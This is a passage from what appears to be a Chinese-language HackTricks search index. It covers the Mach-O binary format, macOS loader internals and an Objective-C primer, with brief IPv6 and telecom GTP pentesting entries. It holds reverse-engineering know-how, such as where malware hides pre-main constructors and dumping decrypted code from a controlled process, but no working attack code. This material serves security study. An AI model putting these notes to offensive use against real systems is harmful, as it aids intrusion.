可执行文件。 MH_FVMLIB: 固定虚拟机库文件。 MH_CORE: 代码转储 MH_PRELOAD: 预加载的可执行文件(在 XNU 中不再支持) MH_DYLIB: 动态库 MH_DYLINKER: 动态链接器 MH_BUNDLE: “插件文件”。使用 gcc 的 -bundle 生成,并由 NSBundle 或 dlopen 显式加载。 MH_DYSM: 伴随的 .dSym 文件(用于调试的符号文件)。 MH_KEXT_BUNDLE: 内核扩展。 bash # Checking the 
mac header of a binary\\notool -arch arm64e -hv /bin/ls\\nMach header\\nmagic cputype cpusubtype caps filetype ncmds sizeofcmds flags\\nMH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DYLDLINK TWOLEVEL PIE 或使用 Mach-O View :","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O 文件类型","id":"2289","title":"Mach-O 文件类型"},"229":{"body":"Legless – IPv6 Penetration Testing mitm6 RFC 8106 – IPv6 ND DNS Configuration http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904 Practical Guide to IPv6 Attacks in a Local Network FiberGateway GR241AG – Full Exploit Chain tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 参考文献","id":"229","title":"参考文献"},"2290":{"body":"源代码还定义了几个用于加载库的标志: MH_NOUNDEFS:没有未定义的引用(完全链接) MH_DYLDLINK:Dyld 链接 MH_PREBOUND:动态引用预绑定。 MH_SPLIT_SEGS:文件分割 r/o 和 r/w 段。 MH_WEAK_DEFINES:二进制文件具有弱定义符号 MH_BINDS_TO_WEAK:二进制文件使用弱符号 MH_ALLOW_STACK_EXECUTION:使堆栈可执行 MH_NO_REEXPORTED_DYLIBS:库没有 LC_REEXPORT 命令 MH_PIE:位置无关可执行文件 MH_HAS_TLV_DESCRIPTORS:有一个包含线程局部变量的部分 MH_NO_HEAP_EXECUTION:堆/数据页面不执行 MH_HAS_OBJC:二进制文件具有 oBject-C 部分 MH_SIM_SUPPORT:模拟器支持 MH_DYLIB_IN_CACHE:用于共享库缓存中的 dylibs/frameworks。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O 标志","id":"2290","title":"Mach-O 标志"},"2291":{"body":"文件在内存中的布局 在这里指定,详细说明了 符号表的位置 、执行开始时主线程的上下文以及所需的 共享库 。向动态加载器 (dyld) 提供了有关二进制文件加载到内存中的过程的指令。 使用 load_command 结构,该结构在提到的 loader.h 中定义: objectivec struct load_command {\\nuint32_t cmd; /* type of load command */\\nuint32_t cmdsize; /* total size of command in bytes */\\n}; 有大约 50 种不同类型的加载命令 ,系统以不同方式处理它们。最常见的有: LC_SEGMENT_64、LC_LOAD_DYLINKER、LC_MAIN、LC_LOAD_DYLIB 和 LC_CODE_SIGNATURE。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O 加载命令","id":"2291","title":"Mach-O 加载命令"},"2292":{"body":"tip 基本上,这种类型的加载命令定义了 如何加载 __TEXT (可执行代码) 和 __DATA (进程数据) 段 ,根据二进制文件执行时在数据部分中指示的 偏移量 。 这些命令 定义了段 ,在执行进程时被 映射 到 虚拟内存空间 中。 有 不同类型 的段,例如 __TEXT 段,它包含程序的可执行代码,以及 __DATA 段,它包含进程使用的数据。这些 段位于 Mach-O 文件的数据部分 中。 每个段 可以进一步 划分 为多个 节 。 加载命令结构 包含关于 这些节 在各自段中的 信息 。 在头部,首先找到 段头 : struct segment_command_64 { /* for 64-bit architectures */\\nuint32_t\\tcmd; /* LC_SEGMENT_64 */\\nuint32_t\\tcmdsize;\\t/* includes sizeof section_64 structs */\\nchar segname[16];\\t/* segment name */\\nuint64_t\\tvmaddr; /* memory address of this segment */\\nuint64_t\\tvmsize; /* memory size of this segment */\\nuint64_t\\tfileoff;\\t/* file 
offset of this segment */\\nuint64_t\\tfilesize;\\t/* amount to map from the file */\\nint32_t maxprot;\\t/* maximum VM protection */\\nint32_t initprot;\\t/* initial VM protection */ uint32_t\\tnsects; /* number of sections in segment */ uint32_t\\tflags; /* flags */\\n}; 段头的示例: 该头部定义了 其后出现的节头的数量 : c struct section_64 { /* for 64-bit architectures */\\nchar sectname[16];\\t/* name of this section */\\nchar segname[16];\\t/* segment this section goes in */\\nuint64_t\\taddr; /* memory address of this section */\\nuint64_t\\tsize; /* size in bytes of this section */\\nuint32_t\\toffset; /* file offset of this section */\\nuint32_t\\talign; /* section alignment (power of 2) */\\nuint32_t\\treloff; /* file offset of relocation entries */\\nuint32_t\\tnreloc; /* number of relocation entries */\\nuint32_t\\tflags; /* flags (section type and attributes)*/\\nuint32_t\\treserved1;\\t/* reserved (for offset or index) */\\nuint32_t\\treserved2;\\t/* reserved (for count or sizeof) */\\nuint32_t\\treserved3;\\t/* reserved */\\n}; 示例 节标题 : 如果你 添加 节偏移 (0x37DC) + 架构开始的偏移 ,在这种情况下 0x18000 --> 0x37DC + 0x18000 = 0x1B7DC 也可以通过 命令行 获取 头信息 : bash otool -lv /bin/ls 常见的由此命令加载的段: __PAGEZERO: 它指示内核 映射 地址零 ,以便 无法读取、写入或执行 。结构中的maxprot和minprot变量设置为零,以指示此页面上 没有读写执行权限 。 此分配对于 缓解NULL指针解引用漏洞 非常重要。这是因为XNU强制实施一个硬页面零,确保内存的第一页(仅第一页)不可访问(在i386中除外)。一个二进制文件可以通过制作一个小的__PAGEZERO(使用-pagezero_size)来满足这些要求,以覆盖前4k,并使其余的32位内存在用户模式和内核模式下可访问。 __TEXT :包含 可执行 代码 ,具有 读取 和 执行 权限(不可写)。此段的常见部分: __text:编译的二进制代码 __const:常量数据(只读) __ [c/u/os_log]string:C、Unicode或os日志字符串常量 __stubs和__stubs_helper:在动态库加载过程中涉及 __unwind_info:堆栈展开数据。 请注意,所有这些内容都是签名的,但也被标记为可执行(为不一定需要此权限的部分(如专用字符串部分)创建更多的利用选项)。 __DATA :包含 可读 和 可写 的数据(不可执行)。 __got: 全局偏移表 __nl_symbol_ptr:非惰性(加载时绑定)符号指针 __la_symbol_ptr:惰性(使用时绑定)符号指针 __const:应为只读数据(实际上不是) __cfstring:CoreFoundation字符串 __data:全局变量(已初始化) __bss:静态变量(未初始化) __objc_*(__objc_classlist,__objc_protolist等):由Objective-C运行时使用的信息 __DATA_CONST 
:__DATA.__const不保证是常量(写权限),其他指针和GOT也是如此。此部分使用mprotect使__const、一些初始化程序和GOT表(解析后) 只读 。 __LINKEDIT :包含链接器(dyld)所需的信息,例如符号、字符串和重定位表条目。它是一个通用容器,包含不在__TEXT或__DATA中的内容,其内容在其他加载命令中描述。 dyld信息:重定位、非惰性/惰性/弱绑定操作码和导出信息 函数开始:函数的起始地址表 代码中的数据:__text中的数据岛 符号表:二进制中的符号 间接符号表:指针/存根符号 字符串表 代码签名 __OBJC :包含由Objective-C运行时使用的信息。尽管这些信息也可能在__DATA段中找到,在各种__objc_*部分中。 __RESTRICT :一个没有内容的段,只有一个名为**__restrict**(也为空)的单一部分,确保在运行二进制文件时,它将忽略DYLD环境变量。 正如在代码中所看到的, 段也支持标志 (尽管它们并不常用): SG_HIGHVM:仅核心(未使用) SG_FVMLIB:未使用 SG_NORELOC:段没有重定位 SG_PROTECTED_VERSION_1:加密。例如,Finder用于加密文本__TEXT段。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_SEGMENT/LC_SEGMENT_64","id":"2292","title":"LC_SEGMENT/LC_SEGMENT_64"},"2293":{"body":"LC_MAIN 包含 entryoff属性 中的入口点。在加载时, dyld 简单地 将 此值添加到(内存中的) 二进制文件基址 ,然后 跳转 到此指令以开始执行二进制代码。 **LC_UNIXTHREAD 包含启动主线程时寄存器必须具有的值。这已经被弃用,但 dyld**仍在使用它。可以通过以下方式查看寄存器设置的值: bash otool -l /usr/lib/dyld\\n[...]\\nLoad command 13\\ncmd LC_UNIXTHREAD\\ncmdsize 288\\nflavor ARM_THREAD_STATE64\\ncount ARM_THREAD_STATE64_COUNT\\nx0 0x0000000000000000 x1 0x0000000000000000 x2 0x0000000000000000\\nx3 0x0000000000000000 x4 0x0000000000000000 x5 0x0000000000000000\\nx6 0x0000000000000000 x7 0x0000000000000000 x8 0x0000000000000000\\nx9 0x0000000000000000 x10 0x0000000000000000 x11 0x0000000000000000\\nx12 0x0000000000000000 x13 0x0000000000000000 x14 0x0000000000000000\\nx15 0x0000000000000000 x16 0x0000000000000000 x17 0x0000000000000000\\nx18 0x0000000000000000 x19 0x0000000000000000 x20 0x0000000000000000\\nx21 0x0000000000000000 x22 0x0000000000000000 x23 0x0000000000000000\\nx24 0x0000000000000000 x25 0x0000000000000000 x26 0x0000000000000000\\nx27 0x0000000000000000 x28 0x0000000000000000 fp 0x0000000000000000\\nlr 0x0000000000000000 sp 0x0000000000000000 pc 0x0000000000004b70\\ncpsr 0x00000000 [...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal 
binaries & Mach-O Format » LC_UNIXTHREAD/LC_MAIN","id":"2293","title":"LC_UNIXTHREAD/LC_MAIN"},"2294":{"body":"包含关于 Mach-O 文件的代码签名 的信息。它仅包含一个 偏移量 ,指向 签名 blob 。这通常位于文件的最末尾。签名 blob 中包含 CodeDirectory(各代码页的哈希)、requirements 以及 entitlements 等内容,可以用 codesign -dvvv 查看。 然而,您可以在 这篇博客文章 和这个 gists 中找到一些关于此部分的信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_CODE_SIGNATURE","id":"2294","title":"LC_CODE_SIGNATURE"},"2295":{"body":"支持二进制加密(例如 App Store 应用的 FairPlay 加密,结构中的 cryptid 字段标明是否已加密)。然而,当然,如果攻击者设法控制了进程,他将能够以未加密的方式转储内存中的代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_ENCRYPTION_INFO[_64]","id":"2295","title":"LC_ENCRYPTION_INFO[_64]"},"2296":{"body":"包含 动态链接器可执行文件的路径 ,该文件将共享库映射到进程地址空间。 值始终设置为 /usr/lib/dyld 。重要的是要注意,在 macOS 中,dylib 映射发生在 用户模式 ,而不是内核模式。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_LOAD_DYLINKER","id":"2296","title":"LC_LOAD_DYLINKER"},"2297":{"body":"过时,但当配置为在崩溃时生成转储时,会创建一个 Mach-O 核心转储,并在 LC_IDENT 命令中设置内核版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_IDENT","id":"2297","title":"LC_IDENT"},"2298":{"body":"随机 UUID。它本身没有直接用途,但 XNU 会将其与其他进程信息一起缓存;它主要用于在崩溃报告和符号化时把二进制与对应的 dSYM 匹配起来。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_UUID","id":"2298","title":"LC_UUID"},"2299":{"body":"允许在进程执行之前向 dyld 指示环境变量。这可能非常危险,因为它可能允许在进程内部执行任意代码,因此此加载命令仅在使用 #define SUPPORT_LC_DYLD_ENVIRONMENT 构建的 dyld 中使用,并进一步限制处理仅限于形式为 DYLD_..._PATH 的变量,指定加载路径。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_DYLD_ENVIRONMENT","id":"2299","title":"LC_DYLD_ENVIRONMENT"},"23":{"body":"首先,需要指出的是,所有 来自其他网站研究的技术的信用归原作者所有 (页面中有引用)。感谢每一个分享知识以提高互联网安全的研究。 HackTricks 是一个由 Carlos 领导的教育 
Wiki,汇集了关于 网络安全 的知识,拥有数百名合作者!这是一个 巨大的黑客技巧集合 ,由社区尽可能地更新,以保持最新。如果您发现有缺失或过时的内容,请发送 Pull Request 到 Hacktricks Github ! HackTricks 也是一个许多研究人员分享他们最新发现的 Wiki,因此这是一个跟上最新黑客技术的好地方。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"About the author » 你好!!","id":"23","title":"你好!!"},"230":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 note 移动核心协议 (GPRS Tunnelling Protocol – GTP) 常常穿越半受信任的 GRX/IPX 漫游骨干。由于它们使用明文 UDP 且几乎没有认证, 任何在电信周边取得的立足点通常都能直接到达核心信令平面 。以下笔记收集了在野外针对 SGSN/GGSN、PGW/SGW 和其它 EPC 节点观察到的攻击技巧。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » Telecom Network Exploitation (GTP / 漫游环境)","id":"230","title":"Telecom Network Exploitation (GTP / 漫游环境)"},"2300":{"body":"此加载命令描述了一个 动态 库 依赖关系, 指示 加载器 (dyld) 加载和链接该库 。每个 Mach-O 二进制文件所需的库都有一个 LC_LOAD_DYLIB 加载命令。 此加载命令是 dylib_command 类型的结构(其中包含一个描述实际依赖动态库的 struct dylib): objectivec struct dylib_command {\\nuint32_t cmd; /* LC_LOAD_{,WEAK_}DYLIB */\\nuint32_t cmdsize; /* includes pathname string */\\nstruct dylib dylib; /* the library identification */\\n}; struct dylib {\\nunion lc_str name; /* library\'s path name */\\nuint32_t timestamp; /* library\'s build time stamp */\\nuint32_t current_version; /* library\'s current version number */\\nuint32_t compatibility_version; /* library\'s compatibility vers number*/\\n}; 您还可以通过命令行获取此信息: bash otool -L 
/bin/ls\\n/bin/ls:\\n/usr/lib/libutil.dylib (compatibility version 1.0.0, current version 1.0.0)\\n/usr/lib/libncurses.5.4.dylib (compatibility version 5.4.0, current version 5.4.0)\\n/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1319.0.0) 一些潜在的与恶意软件相关的库包括: DiskArbitration : 监控 USB 驱动器 AVFoundation: 捕获音频和视频 CoreWLAN : Wifi 扫描。 note Mach-O 二进制文件可以包含一个或 多个 构造函数 ,这些构造函数将在 LC_MAIN 指定的地址 之前 被 执行 。 这些构造函数的偏移量保存在 __DATA_CONST(或 __DATA)段的 __mod_init_func 节中。由于它们在 main 之前运行,分析可疑二进制时应优先检查该节:恶意代码常把初始化逻辑藏在这里,以绕过只关注入口点的审查。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_LOAD_DYLIB","id":"2300","title":"LC_LOAD_DYLIB"},"2301":{"body":"文件的核心是数据区域,由加载命令区域中定义的多个段组成。 每个段中可以包含多种数据部分 ,每个部分 保存特定类型的代码或数据 。 tip 数据基本上是包含所有由加载命令 LC_SEGMENT_64 加载的 信息 的部分。 https://www.oreilly.com/api/v2/epubs/9781785883378/files/graphics/B05055_02_38.jpg 这包括: 函数表: 包含有关程序函数的信息。 符号表 : 包含有关二进制文件使用的外部函数的信息 还可能包含内部函数、变量名称等。 要检查它,您可以使用 Mach-O View 工具: 或者从命令行: bash size -m /bin/ls","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O 数据","id":"2301","title":"Mach-O 数据"},"2302":{"body":"在 __TEXT 段 (r-x): __objc_classname: 类名 (字符串) __objc_methname: 方法名 (字符串) __objc_methtype: 方法类型 (字符串) 在 __DATA 段 (rw-): __objc_classlist: 所有 Objective-C 类的指针 __objc_nlclslist: 非懒加载 Objective-C 类的指针 __objc_catlist: 类别的指针 __objc_nlcatlist: 非懒加载类别的指针 __objc_protolist: 协议列表 __objc_const: 常量数据 __objc_imageinfo, __objc_selrefs, __objc_protorefs...","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Objetive-C 常见部分","id":"2302","title":"Objetive-C 常见部分"},"2303":{"body":"_swift_typeref, _swift3_capture, _swift3_assocty, _swift3_types, _swift3_proto, _swift3_fieldmd, _swift3_builtin, _swift3_reflstr tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red 
Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Swift","id":"2303","title":"Swift"},"2304":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » macOS Objective-C","id":"2304","title":"macOS Objective-C"},"2305":{"body":"caution 请注意,用 Objective-C 编写的程序在编译成 Mach-O binaries 时 保留 其类声明。这些类声明 包括 的信息有: 类名 类方法 类实例变量 您可以使用 class-dump 获取这些信息: bash class-dump Kindle.app 请注意,这些名称可能会被混淆,以使二进制文件的逆向工程更加困难。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » Objective-C","id":"2305","title":"Objective-C"},"2306":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 类、方法和对象","id":"2306","title":"类、方法和对象"},"2307":{"body":"objectivec // Declare the interface of the class\\n@interface MyVehicle : NSObject // Declare the properties\\n@property NSString *vehicleType;\\n@property int numberOfWheels; // Declare the methods\\n- (void)startEngine;\\n- (void)addWheels:(int)value; @end","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 接口、属性和方法","id":"2307","title":"接口、属性和方法"},"2308":{"body":"objectivec @implementation MyVehicle : NSObject // No need to indicate the properties, only define methods - (void)startEngine {\\nNSLog(@\\"Engine started\\");\\n} - (void)addWheels:(int)value 
{\\nself.numberOfWheels += value;\\n} @end","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 类","id":"2308","title":"类"},"2309":{"body":"要创建一个类的实例,调用 alloc 方法,该方法 为每个属性分配内存 并 将这些分配置为零 。然后调用 init ,该方法 将属性初始化为所需的值 。 objectivec // Something like this:\\nMyVehicle *newVehicle = [[MyVehicle alloc] init]; // Which is usually expressed as:\\nMyVehicle *newVehicle = [MyVehicle new]; // To call a method\\n// [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]\\n[newVehicle addWheels:4];","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 对象与调用方法","id":"2309","title":"对象与调用方法"},"231":{"body":"","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 1. Recon & Initial Access","id":"231","title":"1. Recon & Initial Access"},"2310":{"body":"类方法是用 加号 (+) 定义的,而不是用于实例方法的 减号 (-)。例如 NSString 类方法 stringWithString : objectivec + (id)stringWithString:(NSString *)aString;","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 类方法","id":"2310","title":"类方法"},"2311":{"body":"要 设置 和 获取 属性,您可以使用 点表示法 或像 调用方法 一样进行: objectivec // Set\\nnewVehicle.numberOfWheels = 2;\\n[newVehicle setNumberOfWheels:3]; // Get\\nNSLog(@\\"Number of wheels: %i\\", newVehicle.numberOfWheels);\\nNSLog(@\\"Number of wheels: %i\\", [newVehicle numberOfWheels]);","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » Setter & Getter","id":"2311","title":"Setter & Getter"},"2312":{"body":"除了 setter 和 getter 方法,你可以使用实例变量。这些变量与属性同名,但以 \\"_\\" 开头: objectivec - (void)makeLongTruck {\\n_numberOfWheels = +10000;\\nNSLog(@\\"Number of wheels: %i\\", self.numberOfLeaves);\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 实例变量","id":"2312","title":"实例变量"},"2313":{"body":"协议是一组方法声明(没有属性)。实现协议的类实现声明的方法。 方法有两种类型: 必需 和 可选 。默认情况下,方法是 必需 的(但您也可以使用**@required 标签来指示)。要指示方法是可选的,请使用 @optional**。 objectivec @protocol myNewProtocol\\n- (void) method1; //mandatory\\n@required\\n- (void) 
method2; //mandatory\\n@optional\\n- (void) method3; //optional\\n@end","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 协议","id":"2313","title":"协议"},"2314":{"body":"objectivec // gcc -framework Foundation test_obj.m -o test_obj\\n#import @protocol myVehicleProtocol\\n- (void) startEngine; //mandatory\\n@required\\n- (void) addWheels:(int)value; //mandatory\\n@optional\\n- (void) makeLongTruck; //optional\\n@end @interface MyVehicle : NSObject @property int numberOfWheels; - (void)startEngine;\\n- (void)addWheels:(int)value;\\n- (void)makeLongTruck; @end @implementation MyVehicle : NSObject - (void)startEngine {\\nNSLog(@\\"Engine started\\");\\n} - (void)addWheels:(int)value {\\nself.numberOfWheels += value;\\n} - (void)makeLongTruck {\\n_numberOfWheels = +10000;\\nNSLog(@\\"Number of wheels: %i\\", self.numberOfWheels);\\n} @end int main() {\\nMyVehicle* mySuperCar = [MyVehicle new];\\n[mySuperCar startEngine];\\nmySuperCar.numberOfWheels = 4;\\nNSLog(@\\"Number of wheels: %i\\", mySuperCar.numberOfWheels);\\n[mySuperCar setNumberOfWheels:3];\\nNSLog(@\\"Number of wheels: %i\\", mySuperCar.numberOfWheels);\\n[mySuperCar makeLongTruck];\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 一起","id":"2314","title":"一起"},"2315":{"body":"字符串 objectivec // NSString\\nNSString *bookTitle = @\\"The Catcher in the Rye\\";\\nNSString *bookAuthor = [[NSString alloc] initWithCString:\\"J.D. 
Salinger\\" encoding:NSUTF8StringEncoding];\\nNSString *bookPublicationYear = [NSString stringWithCString:\\"1951\\" encoding:NSUTF8StringEncoding]; 基本类是 不可变的 ,因此要将一个字符串附加到现有字符串上, 需要创建一个新的NSString 。 objectivec NSString *bookDescription = [NSString stringWithFormat:@\\"%@ by %@ was published in %@\\", bookTitle, bookAuthor, bookPublicationYear]; 或者你也可以使用一个 可变 字符串类: objectivec NSMutableString *mutableString = [NSMutableString stringWithString:@\\"The book \\"];\\n[mutableString appendString:bookTitle];\\n[mutableString appendString:@\\" was written by \\"];\\n[mutableString appendString:bookAuthor];\\n[mutableString appendString:@\\" and published in \\"];\\n[mutableString appendString:bookPublicationYear]; 数字 objectivec // character literals.\\nNSNumber *theLetterZ = @\'Z\'; // equivalent to [NSNumber numberWithChar:\'Z\'] // integral literals.\\nNSNumber *fortyTwo = @42; // equivalent to [NSNumber numberWithInt:42]\\nNSNumber *fortyTwoUnsigned = @42U; // equivalent to [NSNumber numberWithUnsignedInt:42U]\\nNSNumber *fortyTwoLong = @42L; // equivalent to [NSNumber numberWithLong:42L]\\nNSNumber *fortyTwoLongLong = @42LL; // equivalent to [NSNumber numberWithLongLong:42LL] // floating point literals.\\nNSNumber *piFloat = @3.141592654F; // equivalent to [NSNumber numberWithFloat:3.141592654F]\\nNSNumber *piDouble = @3.1415926535; // equivalent to [NSNumber numberWithDouble:3.1415926535] // BOOL literals.\\nNSNumber *yesNumber = @YES; // equivalent to [NSNumber numberWithBool:YES]\\nNSNumber *noNumber = @NO; // equivalent to [NSNumber numberWithBool:NO] 数组、集合和字典 objectivec // Inmutable arrays\\nNSArray *colorsArray1 = [NSArray arrayWithObjects:@\\"red\\", @\\"green\\", @\\"blue\\", nil];\\nNSArray *colorsArray2 = @[@\\"yellow\\", @\\"cyan\\", @\\"magenta\\"];\\nNSArray *colorsArray3 = @[firstColor, secondColor, thirdColor]; // Mutable arrays\\nNSMutableArray *mutColorsArray = [NSMutableArray array];\\n[mutColorsArray addObject:@\\"red\\"];\\n[mutColorsArray 
addObject:@\\"green\\"];\\n[mutColorsArray addObject:@\\"blue\\"];\\n[mutColorsArray addObject:@\\"yellow\\"];\\n[mutColorsArray replaceObjectAtIndex:0 withObject:@\\"purple\\"]; // Inmutable Sets\\nNSSet *fruitsSet1 = [NSSet setWithObjects:@\\"apple\\", @\\"banana\\", @\\"orange\\", nil];\\nNSSet *fruitsSet2 = [NSSet setWithArray:@[@\\"apple\\", @\\"banana\\", @\\"orange\\"]]; // Mutable sets\\nNSMutableSet *mutFruitsSet = [NSMutableSet setWithObjects:@\\"apple\\", @\\"banana\\", @\\"orange\\", nil];\\n[mutFruitsSet addObject:@\\"grape\\"];\\n[mutFruitsSet removeObject:@\\"apple\\"]; // Dictionary\\nNSDictionary *fruitColorsDictionary = @{\\n@\\"apple\\" : @\\"red\\",\\n@\\"banana\\" : @\\"yellow\\",\\n@\\"orange\\" : @\\"orange\\",\\n@\\"grape\\" : @\\"purple\\"\\n}; // In dictionaryWithObjectsAndKeys you specify the value and then the key:\\nNSDictionary *fruitColorsDictionary2 = [NSDictionary dictionaryWithObjectsAndKeys:\\n@\\"red\\", @\\"apple\\",\\n@\\"yellow\\", @\\"banana\\",\\n@\\"orange\\", @\\"orange\\",\\n@\\"purple\\", @\\"grape\\",\\nnil]; // Mutable dictionary\\nNSMutableDictionary *mutFruitColorsDictionary = [NSMutableDictionary dictionaryWithDictionary:fruitColorsDictionary];\\n[mutFruitColorsDictionary setObject:@\\"green\\" forKey:@\\"apple\\"];\\n[mutFruitColorsDictionary removeObjectForKey:@\\"grape\\"];","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 基本类","id":"2315","title":"基本类"},"2316":{"body":"Blocks 是 作为对象行为的函数 ,因此可以传递给函数或 存储 在 数组 或 字典 中。此外,如果给定值,它们可以 表示一个值 ,因此类似于 lambdas。 objectivec returnType (^blockName)(argumentType1, argumentType2, ...) 
= ^(argumentType1 param1, argumentType2 param2, ...){\\n//Perform operations here\\n}; // For example int (^suma)(int, int) = ^(int a, int b){\\nreturn a+b;\\n};\\nNSLog(@\\"3+4 = %d\\", suma(3,4)); 也可以 定义一个块类型作为函数中的参数 : objectivec // Define the block type\\ntypedef void (^callbackLogger)(void); // Create a bloack with the block type\\ncallbackLogger myLogger = ^{\\nNSLog(@\\"%@\\", @\\"This is my block\\");\\n}; // Use it inside a function as a param\\nvoid genericLogger(callbackLogger blockParam) {\\nNSLog(@\\"%@\\", @\\"This is my function\\");\\nblockParam();\\n}\\ngenericLogger(myLogger); // Call it inline\\ngenericLogger(^{\\nNSLog(@\\"%@\\", @\\"This is my second block\\");\\n});","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » Blocks","id":"2316","title":"Blocks"},"2317":{"body":"objectivec // Manager to manage files\\nNSFileManager *fileManager = [NSFileManager defaultManager]; // Check if file exists:\\nif ([fileManager fileExistsAtPath:@\\"/path/to/file.txt\\" ] == YES) {\\nNSLog (@\\"File exists\\");\\n} // copy files\\nif ([fileManager copyItemAtPath: @\\"/path/to/file1.txt\\" toPath: @\\"/path/to/file2.txt\\" error:nil] == YES) {\\nNSLog (@\\"Copy successful\\");\\n} // Check if the content of 2 files match\\nif ([fileManager contentsEqualAtPath:@\\"/path/to/file1.txt\\" andPath:@\\"/path/to/file2.txt\\"] == YES) {\\nNSLog (@\\"File contents match\\");\\n} // Delete file\\nif ([fileManager removeItemAtPath:@\\"/path/to/file1.txt\\" error:nil]) {\\nNSLog(@\\"Removed successfully\\");\\n} 也可以使用 NSURL 对象而不是 NSString 对象 来管理文件。方法名称类似,但 使用 URL 而不是 Path 。 objectivec tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 